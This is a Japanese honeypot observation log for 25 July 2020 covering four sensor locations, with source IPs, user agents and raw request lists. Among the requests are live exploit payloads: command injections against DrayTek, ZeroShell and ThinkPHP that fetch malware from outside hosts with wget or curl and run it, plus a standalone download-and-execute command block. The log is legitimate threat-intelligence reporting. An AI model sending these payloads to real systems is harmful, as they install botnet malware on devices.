2020/07/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/07/25分です。

特徴

Location：JP

ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location：US

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：UK

Asustor NASの脆弱性を狙うアクセス
ASUS modemの脆弱性を狙うアクセス
AVTECH IP Camera/NVR/DVR Devicesの脆弱性を狙うアクセス
Dell KACE Systems Management Applianceの脆弱性を狙うアクセス
DLink製品の脆弱性を狙うアクセス
EnGenius EnShare IoT Gigabit Cloud Serviceの脆弱性を狙うアクセス
Enigma NMSの脆弱性を狙うアクセス
Geutebruck IP Cameraの脆弱性を狙うアクセス
GoAhead IP Cameraの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
HooToo TripMaterルータの脆弱性を狙うアクセス
Huaweiルータの脆弱性を狙うアクセス
LG Supersignの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
Linksys E-series devicesの脆弱性を狙うアクセス
MiCasa VeraLit Smart home controllerの脆弱性を狙うアクセス
Netgear ReadyNasの脆弱性を狙うアクセス
NetGain Enterprise Managerの脆弱性を狙うアクセスの脆弱性を狙うアクセス
NUUO NVRminiの脆弱性を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Schneider Electric U.motion LifeSpace Management Systemの脆弱性(CVE-2018-7841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Vacron NVR Devicesの脆弱性を狙うアクセス
VMware NSX SD-WAN Edgeの脆弱性(CVE-2018-6961)を狙うアクセス
Wireless Presentation Systemの脆弱性(CVE-2019-3929)を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
ZTEルータの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
Googlebotによるスキャン行為
GoScraperによるスキャン行為
Nmap Scripting Engineによるスキャン行為 Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

cd /tmp;
rm -rf *;
wget  164.90.154.158/reaper/reap.arm4;
chmod 777 /tmp/reap.arm4;
sh /tmp/reap.arm4

Location：SG

DrayTek製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
XTCによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：67 (前日比：-37)
US：総アクセス数：33 (前日比：-10) UK：総アクセス数：393 (前日比：+359) SG：総アクセス数：41 (前日比：-13)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	37.77.99.10	Italy
17	44.224.22.196	United States
34	44.225.84.206	United States
10	49.234.130.107	China
2	129.226.224.230	Singapore
1	178.19.174.247	Italy
2	185.39.11.105	Switzerland

UserAgent一覧

件数	UserAgent
30	-
21	AWS Security Scanner
2	Go-http-client/1.1
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
15		\x16\x03\x01
15	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
6	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
3	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
3	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
3	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
3	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
4	GET	http[:]//example[.]com/	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	61.219.11.153	Taiwan
1	116.236.2.254	China
10	117.144.49.210	China
1	134.19.215.196	Azerbaijan
10	139.155.41.161	China
1	143.255.198.242	Brazil
1	167.172.204.35	United States
1	178.19.174.247	Italy
1	185.39.11.105	Switzerland
4	185.142.236.40	Netherlands
1	191.232.172.26	Brazil
1	201.171.11.42	Mexico

UserAgent一覧

件数	UserAgent
6	-
3	Go-http-client/1.1
1	Hello, World
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
2	XTC
1	python-requests/2.23.0
1	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		\x17\x03\x01\x01\x04e
1	GET	/.well-known/security.txt	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
27	40.121.90.202	United States
1	45.136.108.24	Russia
10	49.233.137.247	China
40	69.167.156.133	United States
1	89.248.168.39	Netherlands
1	89.252.109.146	Russia
186	94.102.59.5	Netherlands
1	116.236.2.254	China
10	118.89.135.162	China
3	132.145.54.7	United States
101	136.169.11.65	Latvia
1	161.97.81.64	Germany
2	185.39.11.105	Switzerland
7	195.54.160.21	Russia
2	203.177.106.195	Philippines

UserAgent一覧

件数	UserAgent
72	-
3	Go-http-client/1.1
19	GoScraper
167	Googlebot/2.1 (+http://www.google.com/bot.html)
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
3	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/Diagnostics.asp	HTTP/1.1
1	GET	/GponForm/diag_Form?images/	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/Main_Analysis_Content.asp	HTTP/1.1
2	GET	/NonExistence	HTTP/1.1
1	GET	/OvCgi/connectedNodes.ovpl	HTTP/1.1
1	GET	/SGPAdmin/fileRequest	HTTP/1.1
1	GET	/SetSmarcardSettings.php	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/UD/act	HTTP/1.1
2	GET	/VhttpdMgr	HTTP/1.1
1	GET	/_async/AsyncResponseServiceHttps	HTTP/1.1
1	GET	/_search	HTTP/1.1
1	GET	/action.php	HTTP/1.1
2	GET	/actionHandler/ajax_network_diagnostic_tools.php	HTTP/1.1
1	GET	/admin.cgi	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi	HTTP/1.1
1	GET	/api/backup/logout.cgi	HTTP/1.1
1	GET	/api/project/repo/log/graph/	HTTP/1.1
1	GET	/apply.cgi	HTTP/1.1
1	GET	/apps/a3/cfg_ethping.cgi	HTTP/1.1
2	GET	/awcuser/cgi-bin/vcs	HTTP/1.1
1	GET	/awstatstotals/awstatstotals.php	HTTP/1.1
1	GET	/ayefeaturesconvert.js	HTTP/1.1
1	GET	/boaform/admin/formPing	HTTP/1.1
1	GET	/board.cgi	HTTP/1.1
1	GET	/boardData102.php	HTTP/1.1
1	GET	/boardData103.php	HTTP/1.1
1	GET	/boardDataJP.php	HTTP/1.1
1	GET	/boardDataNA.php	HTTP/1.1
1	GET	/boardDataWW.php	HTTP/1.1
1	GET	/card_scan_decoder.php	HTTP/1.1
1	GET	/ccbill/whereami.cgi	HTTP/1.1
1	GET	/cgi	HTTP/1.1
2	GET	/cgi-bin/ViewLog.asp	HTTP/1.1
1	GET	/cgi-bin/admin/servetest	HTTP/1.1
1	GET	/cgi-bin/adv_remotelog.asp	HTTP/1.1
2	GET	/cgi-bin/apply.cgi	HTTP/1.1
1	GET	/cgi-bin/awstats.pl	HTTP/1.1
1	GET	/cgi-bin/bconf.cgi	HTTP/1.1
1	GET	/cgi-bin/board.cgi	HTTP/1.1
1	GET	/cgi-bin/ccbill/whereami.cgi	HTTP/1.1
1	GET	/cgi-bin/cgiServer.exx	HTTP/1.1
1	GET	/cgi-bin/cgi_system	HTTP/1.1
1	GET	/cgi-bin/cgi_system?cmd=saveconfig	HTTP/1.1
1	GET	/cgi-bin/ddns_start.cgi	HTTP/1.1
1	GET	/cgi-bin/diagnostic.cgi	HTTP/1.1
1	GET	/cgi-bin/file_transfer.cgi	HTTP/1.1
1	GET	/cgi-bin/getddnsattr.cgi	HTTP/1.1
1	GET	/cgi-bin/getinetattr.cgi	HTTP/1.1
2	GET	/cgi-bin/getnettype.cgi	HTTP/1.1
1	GET	/cgi-bin/getupnp.cgi	HTTP/1.1
1	GET	/cgi-bin/getwifiattr.cgi	HTTP/1.1
1	GET	/cgi-bin/getwifistatus.cgi	HTTP/1.1
1	GET	/cgi-bin/img.pl	HTTP/1.1
1	GET	/cgi-bin/inetconfig.cgi	HTTP/1.1
1	GET	/cgi-bin/iptest.cgi	HTTP/1.1
1	GET	/cgi-bin/kerbynet	HTTP/1.1
69	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/cgi-bin/listwifiap.cgi	HTTP/1.1
1	GET	/cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/api/xqsmarthome/request_mitv	HTTP/1.1
1	GET	/cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/expert/maintenance/diagnostic/nslookup	HTTP/1.1
1	GET	/cgi-bin/luci/;stok=a714f92968ab8cc6466f87c8618cfc30/api/misns/wifi_access	HTTP/1.1
1	GET	/cgi-bin/luci/expert/maintenance/diagnostic/nslookup	HTTP/1.1
1	GET	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	GET	/cgi-bin/masterCGI	HTTP/1.1
1	GET	/cgi-bin/nobody/Search.cgi	HTTP/1.1
1	GET	/cgi-bin/operator/servetest	HTTP/1.1
2	GET	/cgi-bin/p2p.cgi	HTTP/1.1
2	GET	/cgi-bin/pages/maintenance/logSetting/logSet.asp	HTTP/1.1
1	GET	/cgi-bin/paraconf.cgi	HTTP/1.1
1	GET	/cgi-bin/preview_email.cgi	HTTP/1.1
1	GET	/cgi-bin/protected/discover_and_manage.cgi	HTTP/1.1
1	GET	/cgi-bin/scanwifi.cgi	HTTP/1.1
2	GET	/cgi-bin/setadslattr.cgi	HTTP/1.1
1	GET	/cgi-bin/setddnsattr.cgi	HTTP/1.1
1	GET	/cgi-bin/setinetattr.cgi	HTTP/1.1
1	GET	/cgi-bin/setwifiattr.cgi	HTTP/1.1
2	GET	/cgi-bin/spboard/board.cgi	HTTP/1.1
2	GET	/cgi-bin/statuswml.cgi	HTTP/1.1
1	GET	/cgi-bin/system.cgi	HTTP/1.1
1	GET	/cgi-bin/tools_time.asp	HTTP/1.1
1	GET	/cgi-bin/upnp_start.cgi	HTTP/1.1
1	GET	/cgi-bin/webcm	HTTP/1.1
1	GET	/cgi-bin/webctrl.cgi	HTTP/1.1
1	GET	/cgi-bin/whereami.cgi	HTTP/1.1
1	GET	/cgi-bin/wifitest.cgi	HTTP/1.1
1	GET	/command.php	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/csspwn.php	HTTP/1.1
1	GET	/ctrlt/DeviceUpgrade_1	HTTP/1.1
1	GET	/debug.cgi	HTTP/1.1
1	GET	/diagnostic.php	HTTP/1.1
1	GET	/dnslookup.cgi	HTTP/1.1
1	GET	/dogfood/mail/spell.php	HTTP/1.1
1	GET	/editBlackAndWhiteList	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
1	GET	/getpage.gch	HTTP/1.1
1	GET	/global_data/	HTTP/1.1
1	GET	/globe	HTTP/1.1
1	GET	/goform/formSysCmd	HTTP/1.1
1	GET	/goform/mp	HTTP/1.1
2	GET	/handle_iscsi.php	HTTP/1.1
1	GET	/hndBlock.cgi	HTTP/1.1
1	GET	/hndUnblock.cgi	HTTP/1.1
1	GET	/horde/imp/test.php	HTTP/1.1
1	GET	/html/SetSmarcardSettings.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	/imp/test.php	HTTP/1.1
2	GET	/incl/image_test.shtml	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();'	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/js/Multi_Language.js	HTTP/1.1
1	GET	/language/Swedish	HTTP/1.1
1	GET	/linuxki/experimental/vis/kivis.php	HTTP/1.1
1	GET	/login.action	HTTP/1.1
1	GET	/login.cgi	HTTP/1.1
1	GET	/login.gch	HTTP/1.1
1	GET	/login.php	HTTP/1.1
1	GET	/login_handler.php	HTTP/1.1
1	GET	/maintenance/controllerFlirSystem.php	HTTP/1.1
1	GET	/maker/snwrite.cgi	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/mnt_ping.cgi	HTTP/1.1
2	GET	/moadmin/moadmin.php	HTTP/1.1
1	GET	/monitor/op5/nacoma/command_test.php	HTTP/1.1
1	GET	/nagios/cgi-bin/statuswml.cgi	HTTP/1.1
1	GET	/nmaplowercheck1595538608	HTTP/1.1
1	GET	/ona/	HTTP/1.1
1	GET	/op5config/welcome	HTTP/1.1
1	GET	/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2	HTTP/1.1
1	GET	/page/maintenance/lanSettings/dns	HTTP/1.1
1	GET	/pages/systemcall.php	HTTP/1.1
1	GET	/parse_xml.cgi	HTTP/1.1
1	GET	/phpMoAdmin/moadmin.php	HTTP/1.1
1	GET	/phpmoadmin/moadmin.php	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/picsdesc.xml	HTTP/1.1
1	GET	/ping.cgi	HTTP/1.1
1	GET	/portal/apis/aggrecate_js.cgi	HTTP/1.1
1	GET	/protocol.csp	HTTP/1.1
3	GET	/public/index.php	HTTP/1.1
1	GET	/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();'	HTTP/1.1
1	GET	/qsr_server/device/getThumbnail	HTTP/1.1
1	GET	/qsrserver/device/getThumbnail	HTTP/1.1
1	GET	/recordings/misc/callme_page.php	HTTP/1.1
1	GET	/repository/annotate	HTTP/1.1
1	GET	/sarFILE/style.css	HTTP/1.1
1	GET	/scripts/ajaxPortal.lua	HTTP/1.1
2	GET	/scripts/rpc.php	HTTP/1.1
1	GET	/sdwan/nitro/v1/config/get_package_file	HTTP/1.1
1	GET	/service/krashrpt.php	HTTP/1.1
2	GET	/set_ftp.cgi	HTTP/1.1
1	GET	/setup.cgi	HTTP/1.1
1	GET	/setup.xml	HTTP/1.1
1	GET	/shell	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ 164.90.154.158/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4
1	GET	/shell?echo+ukrmoney	HTTP/1.1
1	GET	/smartdomuspad/modules/reporting/track_import_export.php	HTTP/1.1
1	GET	/soap.cgi	HTTP/1.1
1	GET	/softnas/snserver/snserv.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stainfo.cgi	HTTP/1.1
1	GET	/system.ini?loginuse&loginpas	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/tmBlock.cgi	HTTP/1.1
1	GET	/tmUnblock.cgi	HTTP/1.1
1	GET	/u/jsp/tools/exec.jsp	HTTP/1.1
1	GET	/uapi-cgi/admin/testaction.cgi	HTTP/1.1
1	GET	/uapi-cgi/viewer/admin/testaction.cgi	HTTP/1.1
2	GET	/uapi-cgi/viewer/simple_loglistjs.cgi	HTTP/1.1
1	GET	/uapi-cgi/viewer/testaction.cgi	HTTP/1.1
1	GET	/upgrade_handle.php	HTTP/1.1
1	GET	/upnp/control/hag	HTTP/1.1
1	GET	/user/register	HTTP/1.1
1	GET	/utility.cgi	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/cgi-bin/usbinteract.cgi	HTTP/1.1
1	GET	/webadmin/script	HTTP/1.1
1	GET	/wls-wsat/CoordinatorPortType	HTTP/1.1
1	GET	/wp-content/plugins/dzs-videogallery/img.php	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/sdk	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
6	47.197.212.106	United States
1	58.218.199.173	China
1	89.248.168.39	Netherlands
1	103.40.172.173	Hong Kong
1	103.40.172.189	Hong Kong
4	140.206.86.124	China
1	143.255.198.242	Brazil
1	172.104.242.173	United States
1	178.19.174.247	Italy
1	185.39.11.105	Switzerland
1	185.234.218.36	Poland
10	193.112.113.237	China
7	195.54.160.21	Russia
1	195.54.161.68	Russia
4	210.13.110.60	China

UserAgent一覧

件数	UserAgent
16	-
1	Go-http-client/1.1
1	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	XTC
2	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
5		-
1		\x03
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
10	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	http[:]//httpheader[.]net/azenv.php	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1